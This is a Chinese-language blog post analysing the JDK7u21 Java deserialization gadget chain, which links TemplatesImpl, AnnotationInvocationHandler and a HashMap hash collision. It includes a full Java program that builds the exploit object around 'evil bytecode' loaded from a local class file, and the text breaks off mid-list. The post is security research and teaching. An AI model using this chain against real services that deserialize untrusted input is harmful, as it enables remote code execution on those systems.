<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title>
        Aur0ra
    </title>
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.4.2"></head>

<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-reply replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            jdk原生链分析
        </p>
        <hr>
    </div>
    <div class="post-content">
        <h1 id="jdk原生链分析"><a href="#jdk原生链分析" class="headerlink" title="jdk原生链分析"></a>jdk原生链分析</h1><blockquote>
<p>作为jdk中目前发现的原生链，还是有必要要分析这个用法的。<code>全文仅限尽可能还原挖掘思路</code></p>
</blockquote>
<h2 id="JDK7u21"><a href="#JDK7u21" class="headerlink" title="JDK7u21"></a>JDK7u21</h2><p>在很多链中，TemplatesImpl一直发挥着不可或缺的作用，它是位于jdk源码中的一段Gadget:<code>getOutputProperties()-&gt;newTransformer()-&gt;getTransletInstance()-&gt;...</code></p>
<blockquote>
<p>templatesImpl利用回顾:</p>
<ol>
<li>加载对象需要是<code>com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet</code>的实现类</li>
<li>需要设置_name,_bytecodes</li>
<li>_tfactory属性在高版本需要设置，jdk7u21中不是必须，看jdk版本而言-》defineTransletClasses</li>
</ol>
</blockquote>
<p>其中只要能触发上述任意一个函数的，都可以完成TemplatesImpl的动态加载字节码功能。<br><strong>1.所以我们看jdk中是否有调用这三个函数?</strong></p>
<p>还记得<code>sun.reflect.annotation.AnnotationInvocationHandler</code>嘛？这可是java反序列化中的重要角色。而jdk7u21算是对其利用的再挖掘。</p>
<p><code>为了简单直接，我把反编译的代码中的var变量替换了自定义变量</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//AnnotationInvocationHandler.java</span></span><br><span class="line"><span class="keyword">private</span> Boolean <span class="title function_">equalsImpl</span><span class="params">(Object var1)</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (var1 == <span class="built_in">this</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (!<span class="built_in">this</span>.type.isInstance(var1)) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        Method[] methods = <span class="built_in">this</span>.getMemberMethods();<span class="comment">//获取this.type的所有方法</span></span><br><span class="line">        <span class="type">int</span> <span class="variable">methods_num</span> <span class="operator">=</span> methods.length;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span>(<span class="type">int</span> <span class="variable">var4</span> <span class="operator">=</span> <span class="number">0</span>; var4 &lt; methods_num; ++var4) &#123;</span><br><span class="line">            <span class="type">Method</span> <span class="variable">var5</span> <span class="operator">=</span> methods[var4];</span><br><span class="line">            <span class="type">String</span> <span class="variable">var6</span> <span class="operator">=</span> var5.getName();</span><br><span class="line">            <span class="type">Object</span> <span class="variable">var7</span> <span class="operator">=</span> <span class="built_in">this</span>.memberValues.get(var6);</span><br><span class="line">            <span class="type">Object</span> <span class="variable">var8</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">            <span class="type">AnnotationInvocationHandler</span> <span class="variable">var9</span> <span class="operator">=</span> <span class="built_in">this</span>.asOneOfUs(var1);<span class="comment">//判断var1是否是代理类</span></span><br><span class="line">            <span class="keyword">if</span> (var9 != <span class="literal">null</span>) &#123;</span><br><span class="line">                var8 = var9.memberValues.get(var6);</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="keyword">try</span> &#123;</span><br><span class="line">                    var8 = var5.invoke(var1);	<span class="comment">//调用任意方法</span></span><br><span class="line">                &#125; <span class="keyword">catch</span> (InvocationTargetException var11) &#123;</span><br><span class="line">                    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">                &#125; <span class="keyword">catch</span> (IllegalAccessException var12) &#123;</span><br><span class="line">                    <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">AssertionError</span>(var12);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (!memberValueEquals(var7, var8)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">private</span> Method[] getMemberMethods() &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">this</span>.memberMethods == <span class="literal">null</span>) &#123;</span><br><span class="line">        <span class="built_in">this</span>.memberMethods = (Method[])AccessController.doPrivileged(<span class="keyword">new</span> <span class="title class_">PrivilegedAction</span>&lt;Method[]&gt;() &#123;</span><br><span class="line">            <span class="keyword">public</span> Method[] run() &#123;</span><br><span class="line">                Method[] var1 = AnnotationInvocationHandler.<span class="built_in">this</span>.type.getDeclaredMethods();</span><br><span class="line">                AccessibleObject.setAccessible(var1, <span class="literal">true</span>);</span><br><span class="line">                <span class="keyword">return</span> var1;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">this</span>.memberMethods;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>到这里，可以看到this.memberMethods可控，到现在也就是说如果能让AnnotationInvocationHandler调用equalImpl方法，且控制其中的memberMethods，就可以完成任意方法的调用了。</p>
<p>** 2.怎么触发equalsImpl？**</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> Object <span class="title function_">invoke</span><span class="params">(Object var1, Method var2, Object[] var3)</span> &#123;</span><br><span class="line">    <span class="type">String</span> <span class="variable">var4</span> <span class="operator">=</span> var2.getName();</span><br><span class="line">    Class[] var5 = var2.getParameterTypes();</span><br><span class="line">    <span class="keyword">if</span> (var4.equals(<span class="string">&quot;equals&quot;</span>) &amp;&amp; var5.length == <span class="number">1</span> &amp;&amp; var5[<span class="number">0</span>] == Object.class) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">this</span>.equalsImpl(var3[<span class="number">0</span>]);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        ......</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>关键逻辑</code>：如果代理对象调用了equals方法，且满足equals方法有且仅有一个Object类型的参数。</p>
<blockquote>
<p>当前exp,成功触发</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//read evil bytecode-2</span></span><br><span class="line"><span class="type">FileInputStream</span> <span class="variable">is</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileInputStream</span>(<span class="string">&quot;D:\\Projects\\JAVA\\jdkSer\\target\\test-classes\\Aur0ra.class&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="variable">available</span> <span class="operator">=</span> is.available();</span><br><span class="line"><span class="type">byte</span>[] bytes = <span class="keyword">new</span> <span class="title class_">byte</span>[available];</span><br><span class="line">is.read(bytes,<span class="number">0</span>,available);</span><br><span class="line"></span><br><span class="line"><span class="comment">//construct TemplatesImpl</span></span><br><span class="line"><span class="type">TemplatesImpl</span> <span class="variable">templates</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TemplatesImpl</span>();</span><br><span class="line"></span><br><span class="line">Class&lt;? <span class="keyword">extends</span> <span class="title class_">TemplatesImpl</span>&gt; clazz = templates.getClass();</span><br><span class="line"></span><br><span class="line"><span class="type">Field</span> <span class="variable">bytecodes</span> <span class="operator">=</span> clazz.getDeclaredField(<span class="string">&quot;_bytecodes&quot;</span>);</span><br><span class="line">bytecodes.setAccessible(<span class="literal">true</span>);</span><br><span class="line">bytecodes.set(templates,<span class="keyword">new</span> <span class="title class_">byte</span>[][]&#123;bytes&#125;);</span><br><span class="line"></span><br><span class="line"><span class="type">Field</span> <span class="variable">name</span> <span class="operator">=</span> clazz.getDeclaredField(<span class="string">&quot;_name&quot;</span>);</span><br><span class="line">name.setAccessible(<span class="literal">true</span>);</span><br><span class="line">name.set(templates,<span class="string">&quot;Aur0ra&quot;</span>);</span><br><span class="line"></span><br><span class="line">Class&lt;?&gt; annoClass = Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line">Constructor&lt;?&gt; declaredConstructor = annoClass.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line">declaredConstructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Object</span> <span class="variable">anno</span> <span class="operator">=</span> declaredConstructor.newInstance(Annotation.class,<span class="keyword">new</span> <span class="title class_">HashMap</span>());</span><br><span class="line"></span><br><span class="line"><span class="comment">//set anno.type</span></span><br><span class="line">setValue(anno,<span class="string">&quot;type&quot;</span>,TemplatesImpl.class);</span><br><span class="line"></span><br><span class="line">unsetFinal(anno,<span class="string">&quot;memberMethods&quot;</span>);</span><br><span class="line">setValue(anno,<span class="string">&quot;memberMethods&quot;</span>,<span class="keyword">new</span> <span class="title class_">Method</span>[]&#123;clazz.getDeclaredMethod(<span class="string">&quot;getOutputProperties&quot;</span>)&#125;);</span><br><span class="line"></span><br><span class="line"><span class="type">Map</span> <span class="variable">map</span> <span class="operator">=</span> (Map) Proxy.newProxyInstance(Gadget.class.getClassLoader(), <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Map.class&#125;, (InvocationHandler) anno);</span><br><span class="line">map.equals(templates);</span><br></pre></td></tr></table></figure>
</blockquote>
<p><strong>3.接下来就是想办法怎么触发equals方法，且参数可控</strong></p>
<blockquote>
<p>要求反序列化中会进行equals方法的，直接可以去全局搜索，这里借用<code>codeql</code>的话就很香了。</p>
</blockquote>
<p><strong>4.这里就直接丢出目前链子的利用点，直接采用hashMap之类的？为什么采用这个类呢？</strong></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//HashMap.java</span></span><br><span class="line"><span class="keyword">public</span> V <span class="title function_">put</span><span class="params">(K key, V value)</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (key == <span class="literal">null</span>)</span><br><span class="line">        <span class="keyword">return</span> putForNullKey(value);</span><br><span class="line">    <span class="type">int</span> <span class="variable">hash</span> <span class="operator">=</span> hash(key);</span><br><span class="line">    <span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> indexFor(hash, table.length);</span><br><span class="line">    <span class="keyword">for</span> (Entry&lt;K,V&gt; e = table[i]; e != <span class="literal">null</span>; e = e.next) &#123;</span><br><span class="line">        Object k;</span><br><span class="line">        <span class="keyword">if</span> (e.hash == hash &amp;&amp; ((k = e.key) == key || key.equals(k))) &#123;</span><br><span class="line">            <span class="type">V</span> <span class="variable">oldValue</span> <span class="operator">=</span> e.value;</span><br><span class="line">            e.value = value;</span><br><span class="line">            e.recordAccess(<span class="built_in">this</span>);</span><br><span class="line">            <span class="keyword">return</span> oldValue;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    modCount++;</span><br><span class="line">    addEntry(hash, key, value, i);</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>map类在反序列化时肯定进行put操作，这时，我们直接看put方法。<code>其中会有equals操作，前提是key的hash相等，但key不等，相当于就是做hash碰撞》》》也就是让proxy的hash与Templates的hash相等</code></p>
<blockquote>
<p>==yso中巧妙的构造hash–&gt;参照&lt;java 安全漫谈&gt;==</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">final</span> <span class="type">int</span> <span class="title function_">hash</span><span class="params">(Object k)</span> &#123;</span><br><span class="line"> <span class="type">int</span> <span class="variable">h</span> <span class="operator">=</span> <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">if</span> (useAltHashing) &#123;</span><br><span class="line">     <span class="keyword">if</span> (k <span class="keyword">instanceof</span> String) &#123;</span><br><span class="line">         <span class="keyword">return</span> sun.misc.Hashing.stringHash32((String) k);</span><br><span class="line">     &#125;</span><br><span class="line">     h = hashSeed;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> h ^= k.hashCode();</span><br><span class="line"></span><br><span class="line"> <span class="comment">// This function ensures that hashCodes that differ only by</span></span><br><span class="line"> <span class="comment">// constant multiples at each bit position have a bounded</span></span><br><span class="line"> <span class="comment">// number of collisions (approximately 8 at default load factor).</span></span><br><span class="line"> h ^= (h &gt;&gt;&gt; <span class="number">20</span>) ^ (h &gt;&gt;&gt; <span class="number">12</span>);</span><br><span class="line"> <span class="keyword">return</span> h ^ (h &gt;&gt;&gt; <span class="number">7</span>) ^ (h &gt;&gt;&gt; <span class="number">4</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到，hash就是直接调用了对象的hashCode方法生成的。</p>
<p><code>但对象templates的hashcode是一个native方法，每次计算都会变动。</code>==所以现在只能看Proxy的hash计算了，需要让proxy的hash动态等于tempaltesimpl的hash==</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="type">int</span> <span class="title function_">hashCodeImpl</span><span class="params">()</span> &#123;</span><br><span class="line"> <span class="type">int</span> <span class="variable">var1</span> <span class="operator">=</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"> Entry var3;</span><br><span class="line"> <span class="keyword">for</span>(<span class="type">Iterator</span> <span class="variable">var2</span> <span class="operator">=</span> <span class="built_in">this</span>.memberValues.entrySet().iterator(); var2.hasNext(); var1 += <span class="number">127</span> * ((String)var3.getKey()).hashCode() ^ memberValueHashCode(var3.getValue())) &#123;</span><br><span class="line">     var3 = (Entry)var2.next();</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> var1;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>它的计算方式就是<code>累加 127 * ((String)var3.getKey()).hashCode() ^ memberValueHashCode(var3.getValue())</code></p>
<p><strong>关键点：</strong>由于0异或任何等于任何数，此时如果让key的hash等于0，而value等于templatesImpl，那最后不就一直相等了嘛</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> (<span class="type">long</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i &lt; <span class="number">99999999L</span>; i++) &#123;</span><br><span class="line"> <span class="keyword">if</span> (Long.toHexString(i).hashCode() == <span class="number">0</span>) &#123;</span><br><span class="line">     System.out.println(Long.toHexString(i));</span><br><span class="line"> &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>得到了一个<code>f5a5a608</code>,使得<code>((String)var3.getKey()).hashCode()</code>==0,所以我们只需要将<code>AnnotationHandler</code>中的Map添加一组<code>map.put(&quot;f5a5a608&quot;, templates);</code>即可。</p>
</blockquote>
<p>** 5.利用逻辑梳理 **</p>
<p><code>hashMap#put-&gt;hashcode相等，所以直接调用AnnotationInvocationHandler#equalsImpl-&gt;再就是上面分析的利用</code></p>
<p><img src="/images/pasted-4.png" alt="upload successful"></p>
<p>** 6.附上分析结果（有些赘余，此处略优化） **</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> sec.aur0ra;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.xml.transform.Templates;</span><br><span class="line"><span class="keyword">import</span> javax.xml.transform.TransformerConfigurationException;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.FileInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStream;</span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Annotation;</span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Retention;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.*;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Gadget</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> NoSuchFieldException, IOException, IllegalAccessException, TransformerConfigurationException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException &#123;</span><br><span class="line">        <span class="comment">//read evil bytecode-1</span></span><br><span class="line">        <span class="comment">//InputStream is = Aur0ra.class.getResourceAsStream(&quot;Aur0ra.class&quot;);</span></span><br><span class="line"></span><br><span class="line">        <span class="comment">//read evil bytecode-2</span></span><br><span class="line">        <span class="type">FileInputStream</span> <span class="variable">is</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileInputStream</span>(<span class="string">&quot;D:\\Projects\\JAVA\\jdkSer\\target\\test-classes\\Aur0ra.class&quot;</span>);</span><br><span class="line">        </span><br><span class="line">        <span class="type">int</span> <span class="variable">available</span> <span class="operator">=</span> is.available();</span><br><span class="line">        <span class="type">byte</span>[] bytes = <span class="keyword">new</span> <span class="title class_">byte</span>[available];</span><br><span class="line">        is.read(bytes,<span class="number">0</span>,available);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//construct TemplatesImpl</span></span><br><span class="line">        <span class="type">TemplatesImpl</span> <span class="variable">templates</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TemplatesImpl</span>();</span><br><span class="line"></span><br><span class="line">        Class&lt;? <span class="keyword">extends</span> <span class="title class_">TemplatesImpl</span>&gt; clazz = templates.getClass();</span><br><span class="line"></span><br><span class="line">        <span class="type">Field</span> <span class="variable">bytecodes</span> <span class="operator">=</span> clazz.getDeclaredField(<span class="string">&quot;_bytecodes&quot;</span>);</span><br><span class="line">        bytecodes.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        bytecodes.set(templates,<span class="keyword">new</span> <span class="title class_">byte</span>[][]&#123;bytes&#125;);</span><br><span class="line"></span><br><span class="line">        <span class="type">Field</span> <span class="variable">name</span> <span class="operator">=</span> clazz.getDeclaredField(<span class="string">&quot;_name&quot;</span>);</span><br><span class="line">        name.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        name.set(templates,<span class="string">&quot;Aur0ra&quot;</span>);</span><br><span class="line"></span><br><span class="line">        Class&lt;?&gt; annoClass = Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line">        Constructor&lt;?&gt; declaredConstructor = annoClass.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line">        declaredConstructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">Object</span> <span class="variable">anno</span> <span class="operator">=</span> declaredConstructor.newInstance(Annotation.class,<span class="keyword">new</span> <span class="title class_">HashMap</span>());</span><br><span class="line"></span><br><span class="line">        <span class="comment">//set anno.type</span></span><br><span class="line">        setValue(anno,<span class="string">&quot;type&quot;</span>,TemplatesImpl.class);</span><br><span class="line"></span><br><span class="line">        unsetFinal(anno,<span class="string">&quot;memberMethods&quot;</span>);</span><br><span class="line">        setValue(anno,<span class="string">&quot;memberMethods&quot;</span>,<span class="keyword">new</span> <span class="title class_">Method</span>[]&#123;clazz.getDeclaredMethod(<span class="string">&quot;getOutputProperties&quot;</span>)&#125;);</span><br><span class="line"></span><br><span class="line">        <span class="type">Map</span> <span class="variable">proxy</span> <span class="operator">=</span> (Map) Proxy.newProxyInstance(Gadget.class.getClassLoader(), <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Map.class&#125;, (InvocationHandler) anno);</span><br><span class="line"></span><br><span class="line">        <span class="type">HashMap</span> <span class="variable">map</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HashMap</span>();</span><br><span class="line">        map.put(<span class="string">&quot;f5a5a608&quot;</span>, templates);</span><br><span class="line"></span><br><span class="line">        unsetFinal(anno,<span class="string">&quot;memberValues&quot;</span>);</span><br><span class="line">        setValue(anno,<span class="string">&quot;memberValues&quot;</span>,map);</span><br><span class="line">        </span><br><span class="line">        <span class="type">HashMap</span> <span class="variable">hashMap</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HashMap</span>();</span><br><span class="line">        hashMap.put(templates,templates);</span><br><span class="line">        hashMap.put(proxy,<span class="number">123</span>);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">setValue</span><span class="params">(Object obj,String filed,Object value)</span>&#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">Field</span> <span class="variable">declaredField</span> <span class="operator">=</span> obj.getClass().getDeclaredField(filed);</span><br><span class="line"></span><br><span class="line">            declaredField.setAccessible(<span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">            declaredField.set(obj,value);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (NoSuchFieldException e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IllegalAccessException e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">unsetFinal</span><span class="params">(Object obj,String field)</span> <span class="keyword">throws</span> NoSuchFieldException, IllegalAccessException &#123;</span><br><span class="line">        Class&lt;?&gt; aClass = obj.getClass();</span><br><span class="line">        <span class="type">Field</span> <span class="variable">declaredField</span> <span class="operator">=</span> aClass.getDeclaredField(field);</span><br><span class="line"></span><br><span class="line">        <span class="type">Field</span> <span class="variable">modifiers</span> <span class="operator">=</span> declaredField.getClass().getDeclaredField(<span class="string">&quot;modifiers&quot;</span>);</span><br><span class="line">        modifiers.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        modifiers.set(declaredField,declaredField.getModifiers()&amp;~Modifier.TRANSIENT);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="疑点重重"><a href="#疑点重重" class="headerlink" title="疑点重重"></a>疑点重重</h3><ol>
<li><p>为什么采用TemplatesImpl#newTransformer,而不直接采用getTransletInstance?</p>
<p>你试试就知道了。是因为最后调用时，getTransletInstance是private方法，无法被触发，所以采用了newTransformer,当然采用getOutputProperties也是可以的。</p>
</li>
<li><p>为什么很多地方给的不是hashmap而是LinkedHashSet等？</p>
<p>采用LinkedHashSet是因为它重新进行put时，会按照既定的顺序，会直接影响利用结果。这里的话，似乎影响不大，但也有可能出现错误。</p>
</li>
<li><p>type需要使用Templates.class，而不是TemplatesImpl.class</p>
</li>
</ol>
<h3 id="修复与分析"><a href="#修复与分析" class="headerlink" title="修复与分析"></a>修复与分析</h3><ol>
<li>为什么jdk7u21前的版本中，不是Annotation类照样可以成功运行exp呢？</li>
</ol>
<p><img src="/images/pasted-1.png" alt="upload successful"></p>
<p>   可以看到，这里type已成功赋值为目标Class对象，所以下面return的时候，不影响序列化的结果。</p>
<blockquote>
<p>这里留个疑问：为什么明显目标需要是<code>private final Class&lt;? extends Annotation&gt; type;</code>，而这里放了一个TemplatesImpl在里面，这不是不合乎语法嘛？</p>
</blockquote>
<ol start="2">
